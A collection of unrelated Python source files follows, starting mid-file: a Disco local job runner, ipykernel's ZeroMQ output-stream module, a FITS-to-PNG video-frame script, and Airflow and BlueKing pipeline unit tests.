if self.thread_exception:
raise self.thread_exception
# If we want most recent data switch data type to what was most recent
if data_type == 'most_recent' and data_type in self.latest_data:
data_type = self.latest_data[data_type]
# Return if data has not been fetched, otherwise we have no data just return False
if data_type in self.latest_data:
return not self.latest_data[data_type]['fetched']
else:
return False
def get_latest_data(self, data_type='most_recent', auto_add_data_keys=True):
"""
Return latest data as regular Python structured and record that latest data has been fetched
:param data_type: Which object type do we want to see if data is available for (or default to most recent data)
:param auto_add_data_keys: If true, data arrays will be converted from integer arrays to dictionaries
:return: Latest data as Python structure (or None if there is no data yet)
"""
# If we want most recent data switch data type to what was most recent
if data_type == 'most_recent' and data_type in self.latest_data:
data_type = self.latest_data[data_type]
# Return data, otherwise we have no data just return None
if data_type in self.latest_data:
self.latest_data[data_type]['fetched'] = True
if auto_add_data_keys:
return add_data_keys(self.latest_data[data_type]['data'], 'udp')
else:
return self.latest_data[data_type]['data']
else:
return None
class UdpError(Exception):
pass
class UdpParseError(Exception):
pass
|
disco.py
|
from __future__ import absolute_import
import json
import os
from StringIO import StringIO
from urlparse import urlparse, parse_qs
import threading
import re
from functools import partial
import hashlib
from datetime import datetime
import time
import disco
from disco.core import Disco
from .io import puts
from . import event_loop
from . import job_control
from . import server
disco_url_regex = re.compile(".*?://.*?/disco/(.*)")
preferred_host_re = re.compile("^[a-zA-Z0-9]+://([^/:]*)")
def run_script(script, data_root):
loop = start_event_loop()
job_control.set_event_loop(loop)
try:
patch_disco()
host,port = server.start(loop)
os.environ['DISCO_HOME'] = disco.__path__[0]
os.environ['DISCO_DATA'] = data_root
os.environ['DISCO_PORT'] = str(port)
os.environ['DDFS_PUT_PORT'] = str(port)
globals_ = {
"__name__" : "__main__",
"__file__" : script,
"__builtins__" : __builtins__
}
locals_ = globals_
exec(compile(open(script).read(), script, 'exec'), globals_, locals_)
finally:
loop.stop()
def start_event_loop():
event = threading.Event()
ret = []
def _():
ev = event_loop.current_event_loop()
ret.append(ev)
# wake up our parent thread
event.set()
ev.run()
threading.Thread(target=_).start()
event.wait()
return ret[0]
def patch_disco():
Disco._wait = Disco.wait
Disco.wait = wait
Disco.submit = submit
Disco.request = request
def submit(self, jobpack):
return job_control.new(jobpack).name
def request(self, url, data=None, offset=0):
#puts(url)
url = urlparse(url)
# unwrap query
args = dict([ (k,v[0]) for k,v in parse_qs(url.query).items()])
path = url.path
if path == '/disco/ctrl/jobinfo':
return jobinfo(**args)
elif path == '/disco/ctrl/rawevents':
return rawevents(**args)[offset:]
elif path == '/disco/ctrl/get_results':
return get_results()
else:
raise RuntimeError("Unexpected url {}".format(url))
def wait(self, jobname, poll_interval=.01, timeout=None, clean=False, show=None):
# We're local so reduce lag by polling faster...
return self._wait(jobname, poll_interval, timeout, clean, show)
def jobinfo(name):
job = job_control.get(name)
return json.dumps(job.info())
def rawevents(name):
events = [
["2013/03/20 12:45:20","master","New job initialized!"]
]
return "\n".join([ json.dumps(e) for e in events ])
def get_results():
jobs = job_control.jobs.values()
return json.dumps([
(job.name, [job.status, job.results]) for job in jobs
])
def disco_url_path(url):
return disco_url_regex.match(url).group(1)
def job_home(job_name, root):
return os.path.join(root, hex_hash(job_name), job_name)
def job_url(host, job_name):
return os.path.join("disco", host, hex_hash(job_name), job_name)
def hex_hash(path):
"""
Return the first 2 hex digits of the md5 of the given path.
Suitable for creating sub dirs to break up a large directory
"""
return hashlib.md5(path).hexdigest()[:2]
def preferred_host(url):
m = preferred_host_re.search(url)
if m:
return m.group(1)
def timestamp(dt=None):
"""
Return a timestamp in the format of hex(megasecconds)-hex(seconds)-hex(microseconds)
The timestamp should be monotonically increasing and hence usable as a uuid
"""
if dt is None:
dt = datetime.utcnow()
mega, seconds = map(int, divmod(time.mktime(dt.timetuple()), 10**6))
return "{:x}-{:x}-{:x}".format(mega, seconds, dt.microsecond)
|
iostream.py
|
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import atexit
import io
import os
import sys
import threading
import traceback
import warnings
from binascii import b2a_hex
from collections import deque
from io import StringIO, TextIOBase
from typing import Any, Callable, Deque, Optional
from weakref import WeakSet
import zmq
from jupyter_client.session import extract_header
from tornado.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
# -----------------------------------------------------------------------------
# Globals
# -----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
# -----------------------------------------------------------------------------
# IO classes
# -----------------------------------------------------------------------------
class IOPubThread:
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket : zmq.PUB Socket
the socket on which messages will be sent.
pipe : bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events: Deque[Callable[..., Any]] = deque()
self._event_pipes: WeakSet[Any] = WeakSet()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main, name="IOPub")
self.thread.daemon = True
self.thread.pydev_do_not_trace = True # type:ignore[attr-defined]
self.thread.is_pydev_daemon_thread = True # type:ignore[attr-defined]
self.thread.name = "IOPub"
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode("ascii")
iface = self._event_interface = "inproc://%s" % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
# WeakSet so that event pipes will be closed by garbage collection
# when their threads are terminated
self._event_pipes.add(event_pipe)
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for _ in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn(
"Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e
+ "\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.name = "IOPub"
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
# close *all* event pipes, created in any thread
# event pipes can only be used from other threads while self.thread.is_alive()
# so after thread.join, this should be safe
for event_pipe in self._event_pipes:
event_pipe.close()
def close(self):
if self.closed:
return
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b"")
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda: self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
if self.closed:
return
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket:
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith("__") and attr.endswith("__"):
# don't wrap magic methods
super().__getattr__(attr) # type:ignore[misc]
assert self.io_thread is not None
if hasattr(self.io_thread.socket, attr):
warnings.warn(
f"Accessing zmq Socket attribute {attr} on BackgroundSocket"
f" is deprecated since ipykernel 4.3.0"
f" use .io_thread.socket.{attr}",
DeprecationWarning,
stacklevel=2,
)
return getattr(self.io_thread.socket, attr)
super().__getattr__(attr) # type:ignore[misc]
def __setattr__(self, attr, value):
if attr == "io_thread" or (attr.startswith("__" and attr.endswith("__"))):
super().__setattr__(attr, value)
else:
warnings.warn(
f"Setting zmq Socket attribute {attr} on BackgroundSocket"
f" is deprecated since ipykernel 4.3.0"
f" use .io_thread.socket.{attr}",
DeprecationWarning,
stacklevel=2,
)
assert self.io_thread is not None
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
assert self.io_thread is not None
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = "UTF-8"
_exc: Optional[Any] = None
def fileno(self):
"""
Things like subprocess will peak and write to the fileno() of stderr/stdout.
"""
if getattr(self, "_original_stdstream_copy", None) is not None:
return self._original_stdstream_copy
else:
raise io.UnsupportedOperation("fileno")
def _watch_pipe_fd(self):
"""
We've redirected standards steams 0 and 1 into a pipe.
We need to watch in a thread and redirect them to the right places.
1) the ZMQ channels to show in notebook interfaces,
2) the original stdout/err, to capture errors in terminals.
We cannot schedule this on the ioloop thread, as this might be blocking.
"""
try:
bts = os.read(self._fid, 1000)
while bts and self._should_watch:
self.write(bts.decode())
os.write(self._original_stdstream_copy, bts)
bts = os.read(self._fid, 1000)
except Exception:
self._exc = sys.exc_info()
def __init__(
self,
session,
pub_thread,
name,
pipe=None,
echo=None,
*,
watchfd=True,
isatty=False,
):
"""
Parameters
----------
name : str {'stderr', 'stdout'}
the name of the standard stream to replace
watchfd : bool (default, True)
Watch the file descripttor corresponding to the replaced stream.
This is useful if you know some underlying code will write directly
the file descriptor by its number. It will spawn a watching thread,
that will swap the give file descriptor for a pipe, read from the
pipe, and insert this into the current Stream.
isatty : bool (default, False)
Indication of whether this stream has termimal capabilities (e.g. can handle colors)
"""
if pipe is not None:
warnings.warn(
"pipe argument to OutStream is deprecated and ignored since ipykernel 4.2.3.",
DeprecationWarning,
stacklevel=2,
)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn(
"Since IPykernel 4.3, OutStream should be created with "
"IOPubThread, not %r" % pub_thread,
DeprecationWarning,
stacklevel=2,
)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b"stream." + name.encode()
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._subprocess_flush_pending = False
self._io_loop = pub_thread.io_loop
self._buffer_lock = threading.RLock()
self._buffer = StringIO()
self.echo = None
self._isatty = bool(isatty)
if (
watchfd
and (sys.platform.startswith("linux") or sys.platform.startswith("darwin"))
and ("PYTEST_CURRENT_TEST" not in os.environ)
):
# Pytest set its own capture. Dont redirect from within pytest.
self._should_watch = True
self._setup_stream_redirects(name)
if echo:
if hasattr(echo, "read") and hasattr(echo, "write"):
self.echo = echo
else:
raise ValueError("echo argument must be a file like object")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Returns:
Boolean
"""
return self._isatty
def _setup_stream_redirects(self, name):
pr, pw = os.pipe()
fno = getattr(sys, name).fileno()
self._original_stdstream_copy = os.dup(fno)
os.dup2(pw, fno)
self._fid = pr
self._exc = None
self.watch_fd_thread = threading.Thread(target=self._watch_pipe_fd)
self.watch_fd_thread.daemon = True
self.watch_fd_thread.start()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
self._should_watch = False
self.watch_fd_thread.join()
if self._exc:
etype, value, tb = self._exc
traceback.print_exception(etype, value, tb)
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if (
self.pub_thread
and self.pub_thread.thread is not None
and self.pub_thread.thread.is_alive()
and self.pub_thread.thread.ident != threading.current_thread().ident
):
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
evt = threading.Event()
self.pub_thread.schedule(evt.set)
# and give a timeout to avoid
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
self._subprocess_flush_pending = False
if self.echo is not None:
try:
self.echo.flush()
except OSError as e:
if self.echo is not sys.__stderr__:
print(f"Flush failed: {e}", file=sys.__stderr__)
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {"name": self.name, "text": data}
self.session.send(
self.pub_thread,
"stream",
content=content,
parent=self.parent_header,
ident=self.topic,
)
def write(self, string: str) -> Optional[int]: # type:ignore[override]
"""Write to current stream after encoding if necessary
Returns
-------
len : int
number of items from input parameter written to stream.
"""
if not isinstance(string, str):
raise TypeError(f"write() argument must be str, not {type(string)}")
if self.echo is not None:
try:
self.echo.write(string)
except OSError as e:
if self.echo is not sys.__stderr__:
print(f"Write failed: {e}", file=sys.__stderr__)
if self.pub_thread is None:
raise ValueError("I/O operation on closed file")
else:
is_child = not self._is_master_process()
# only touch the buffer in the IO thread to avoid races
with self._buffer_lock:
self._buffer.write(string)
if is_child:
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if self._subprocess_flush_pending:
return None
self._subprocess_flush_pending = True
# We can not rely on self._io_loop.call_later from a subprocess
self.pub_thread.schedule(self._flush)
else:
self._schedule_flush()
return len(string)
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError("I/O operation on closed file")
else:
for string in sequence:
self.write(string)
def writable(self):
return True
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data."""
buf = self._rotate_buffer()
data = buf.getvalue()
buf.close()
return data
def _rotate_buffer(self):
"""Returns the current buffer and replaces it with an empty buffer."""
with self._buffer_lock:
old_buffer = self._buffer
self._buffer = StringIO()
return old_buffer
|
make_video_frames.py
|
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
import sys
import subprocess, shlex
import os
import os.path
import string
import logging
import argparse
import threading
from glob import glob
# Parameters to transform fits to png
bin = 'fits2png.x'
def run_cmd(cmd):
logging.debug("About to execute: %s", ' '.join(cmd))
try:
process = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds = True)
stdout, stderr = process.communicate()
return_code = process.poll()
if return_code != 0:
logging.error("Failed running command %s : Return code : %d\t Stdout: %s\t StdErr: %s", ' '.join(cmd), return_code, stderr, stdout)
return False
except Exception, why:
logging.error('Failed running command %s : %s', ' '.join(cmd), str(why))
return False
else:
if logging.root.isEnabledFor(logging.DEBUG):
logging.debug("Command %s : Return code : %d\t Stdout: %s\t StdErr: %s", ' '.join(cmd), return_code, stderr, stdout)
return True
def fits2images(fits_files, output_directory = '.', config_file = None, force = False):
# We make up the fits2png command
cmd = [bin, '-O', output_directory]
if config_file:
cmd.extend(['-C', config_file])
for fits_file in fits_files:
if not force:
fits_filename, trash = os.path.splitext(os.path.basename(fits_file))
image_filename = os.path.join(output_directory, fits_filename+ '.png')
if os.path.exists(image_filename):
continue
run_cmd(cmd + [fits_file])
def setup_logging(filename = None, quiet = False, verbose = False, debug = False):
global logging
if debug:
logging.basicConfig(level = logging.DEBUG, format='%(levelname)-8s: %(message)s')
elif verbose:
logging.basicConfig(level = logging.INFO, format='%(levelname)-8s: %(message)s')
else:
logging.basicConfig(level = logging.CRITICAL, format='%(levelname)-8s: %(message)s')
if quiet:
logging.root.handlers[0].setLevel(logging.CRITICAL + 10)
elif debug:
logging.root.handlers[0].setLevel(logging.DEBUG)
elif verbose:
logging.root.handlers[0].setLevel(logging.INFO)
else:
logging.root.handlers[0].setLevel(logging.CRITICAL)
if filename:
fh = logging.FileHandler(filename, delay=True)
fh.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(funcName)-12s %(message)s', datefmt='%Y-%m-%d %H:%M:%S'))
if debug:
fh.setLevel(logging.DEBUG)
else:
fh.setLevel(logging.INFO)
logging.root.addHandler(fh)
# Start point of the script
if __name__ == "__main__":
script_name = os.path.splitext(os.path.basename(sys.argv[0]))[0]
# Get the arguments
parser = argparse.ArgumentParser(description='Make video frames from fits files.')
parser.add_argument('--debug', '-d', default=False, action='store_true', help='Set the logging level to debug')
parser.add_argument('--quiet', '-q', default=False, action='store_true', help='Do not display any error message.')
parser.add_argument('--output_directory', '-o', default='.', help='The directory in which the video frame will be created')
parser.add_argument('--config', '-c', help='A configuration file for fits2png')
parser.add_argument('--threads', '-t', default=1, type=int, help='The number of threads to use.')
parser.add_argument('--force', '-f', default=False, action='store_true', help='Overwrite video frame if it exists already')
parser.add_argument('fits_files', nargs='+', help='The paths of the fits files')
args = parser.parse_args()
# Setup the logging
setup_logging(quiet = args.quiet, verbose = True, debug = args.debug)
if not args.fits_files:
logging.error("You must specify at least one fits file")
sys.exit(2)
# We glob the fits_files
fits_files = list()
for fits_file in args.fits_files:
if os.path.exists(fits_file):
fits_files.append(fits_file)
else:
files = sorted(glob(fits_file))
if files:
fits_files.extend(files)
else:
logging.warning("File %s not found, skipping!", fits_file)
number_threads = max(1, args.threads)
start_pos = 0
delta_pos = int(len(fits_files) / number_threads)
while start_pos + delta_pos < len(fits_files):
logging.debug("Starting thread for fits files %d to %d", start_pos, start_pos + delta_pos)
thread = threading.Thread(group=None, name='fits2images', target=fits2images, args=(fits_files[start_pos:start_pos+delta_pos], args.output_directory, args.config, args.force))
thread.start()
start_pos += delta_pos
if start_pos < len(fits_files):
fits2images(fits_files[start_pos:], args.output_directory, args.config, args.force)
|
test_local_task_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import time
import unittest
from airflow import AirflowException, models, settings
from airflow.configuration import conf
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs import LocalTaskJob
from airflow.models import DAG, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import timezone
from airflow.utils.db import create_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from tests.compat import patch
from tests.test_core import TEST_DAG_FOLDER
from tests.test_utils.db import clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
self.assertGreater(len(heartbeat_records), 2)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
self.assertGreaterEqual((time2 - time1).total_seconds(), job.heartrate)
@unittest.skipIf('mysql' in conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
def test_localtaskjob_maintain_heart_rate(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
self.assertEqual(mock_start.call_count, 1)
self.assertEqual(mock_ret_code.call_count, 2)
time_end = time.time()
self.assertEqual(self.mock_base_job_sleep.call_count, 1)
self.assertEqual(job1.state, State.SUCCESS)
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
self.assertLess(time_end - time_start, job1.heartrate)
session.close()
|
test_schedule.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import threading
from django.test import TransactionTestCase
from bamboo_engine.eri.models import Schedule, ScheduleType
from pipeline.eri.models import Schedule as DBSchedule
from pipeline.eri.imp.schedule import ScheduleMixin
class ScheduleMixinTestCase(TransactionTestCase):
def setUp(self):
self.mixin = ScheduleMixin()
self.process_id = 99
self.node_id = "nid"
self.version = "v1"
self.schedule_type = ScheduleType.POLL
self.schedule = DBSchedule.objects.create(
process_id=self.process_id, node_id=self.node_id, version="v2", type=self.schedule_type.value
)
def test_set_schedule(self):
schedule = self.mixin.set_schedule(
process_id=self.process_id, node_id=self.node_id, version=self.version, schedule_type=self.schedule_type
)
schedule_model = DBSchedule.objects.get(id=schedule.id)
self.assertTrue(schedule, Schedule)
self.assertEqual(schedule.id, schedule_model.id)
self.assertEqual(schedule.type, self.schedule_type)
self.assertEqual(schedule.process_id, self.process_id)
